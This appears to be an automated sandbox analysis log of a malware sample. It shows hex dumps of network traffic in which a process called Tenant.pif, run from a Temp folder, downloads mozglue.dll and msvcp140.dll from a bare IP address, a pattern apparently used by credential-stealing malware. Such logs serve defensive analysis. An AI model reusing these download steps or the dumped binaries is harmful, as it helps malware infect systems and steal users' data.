                                                                                      Data Ascii: 1M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]w
                                                                                      2024-08-29 18:49:38 UTC16384INData Raw: 7d 08 83 c4 0c 8a 87 18 01 00 00 30 03 8a 87 19 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01
                                                                                      Data Ascii: }00C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwE
                                                                                      2024-08-29 18:49:38 UTC16384INData Raw: 0e 81 e6 fc 03 00 00 33 8e 70 3b 08 10 8b 75 e0 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1
                                                                                      Data Ascii: 3p;u^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?Uu
                                                                                      2024-08-29 18:49:38 UTC16384INData Raw: 00 00 c7 45 bc 00 00 00 00 8d 45 e0 50 e8 04 5a 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f
                                                                                      Data Ascii: EEPZ}EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w
                                                                                      2024-08-29 18:49:38 UTC16384INData Raw: 04 8d 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00
                                                                                      Data Ascii: D$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE
                                                                                      2024-08-29 18:49:38 UTC16384INData Raw: 7d 88 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff
                                                                                      Data Ascii: }eUeLXee0@eeeue0UEeeUeee $
                                                                                      2024-08-29 18:49:38 UTC16384INData Raw: 38 8b 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80
                                                                                      Data Ascii: 8O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEE
                                                                                      2024-08-29 18:49:38 UTC16384INData Raw: 1c c1 ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6
                                                                                      Data Ascii: ,0<48%8A)$


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      12192.168.2.55994994.130.188.1484432260C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-08-29 18:49:39 UTC225OUTGET /mozglue.dll HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                      Host: 94.130.188.148
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-08-29 18:49:40 UTC262INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Thu, 29 Aug 2024 18:49:40 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 608080
                                                                                      Connection: close
                                                                                      Last-Modified: Thursday, 29-Aug-2024 18:49:40 GMT
                                                                                      Cache-Control: no-store, no-cache
                                                                                      Accept-Ranges: bytes
                                                                                      2024-08-29 18:49:40 UTC16122INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00
                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
                                                                                      2024-08-29 18:49:40 UTC16384INData Raw: c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 31 ff ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00
                                                                                      Data Ascii: #H1A$P~#HbA$P~#HUVuF|FlNhFdFhFTNP
                                                                                      2024-08-29 18:49:40 UTC16384INData Raw: ff 8b 45 a8 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c
                                                                                      Data Ascii: EPzEPWxP1`PHP$,FM1R'^_[]00L9tc<
                                                                                      2024-08-29 18:49:40 UTC16384INData Raw: 06 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9
                                                                                      Data Ascii: )0LY)0LZ|!i(0C}L8!i(0u9Gu)0E8)0}L
                                                                                      2024-08-29 18:49:40 UTC16384INData Raw: 83 c4 04 89 45 f0 8b 06 8b 4e 04 85 c9 0f 8e b3 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89
                                                                                      Data Ascii: EN1B]zB|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSRE
                                                                                      2024-08-29 18:49:40 UTC16384INData Raw: 42 fd ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc
                                                                                      Data Ascii: BH) sH) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) s
                                                                                      2024-08-29 18:49:40 UTC16384INData Raw: 00 00 85 db 0f 85 ad 07 00 00 c7 44 24 30 00 00 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34
                                                                                      Data Ascii: D$0D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjjPS,VL$4
                                                                                      2024-08-29 18:49:40 UTC16384INData Raw: 8b b8 08 00 00 00 85 ff 0f 84 0b 06 00 00 83 fb 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c
                                                                                      Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<
                                                                                      2024-08-29 18:49:40 UTC16384INData Raw: 83 e1 fe 83 e0 01 09 c8 89 42 04 89 13 8d 44 24 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b
                                                                                      Data Ascii: BD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKN
                                                                                      2024-08-29 18:49:40 UTC16384INData Raw: b9 00 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48
                                                                                      Data Ascii: DL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      13192.168.2.55995094.130.188.1484432260C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-08-29 18:49:42 UTC226OUTGET /msvcp140.dll HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                      Host: 94.130.188.148
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-08-29 18:49:42 UTC262INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Thu, 29 Aug 2024 18:49:42 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 450024
                                                                                      Connection: close
                                                                                      Last-Modified: Thursday, 29-Aug-2024 18:49:42 GMT
                                                                                      Cache-Control: no-store, no-cache
                                                                                      Accept-Ranges: bytes
                                                                                      2024-08-29 18:49:42 UTC16122INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
                                                                                      2024-08-29 18:49:42 UTC16384INData Raw: 72 00 2d 00 62 00 61 00 00 00 68 00 72 00 2d 00 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d
                                                                                      Data Ascii: r-bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnm
                                                                                      2024-08-29 18:49:42 UTC16384INData Raw: 00 00 04 00 00 00 04 8b 00 10 18 8b 00 10 78 8a 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff
                                                                                      Data Ascii: x{|L@DX}0}}M@4}0}}4M@tXM}0}}XM
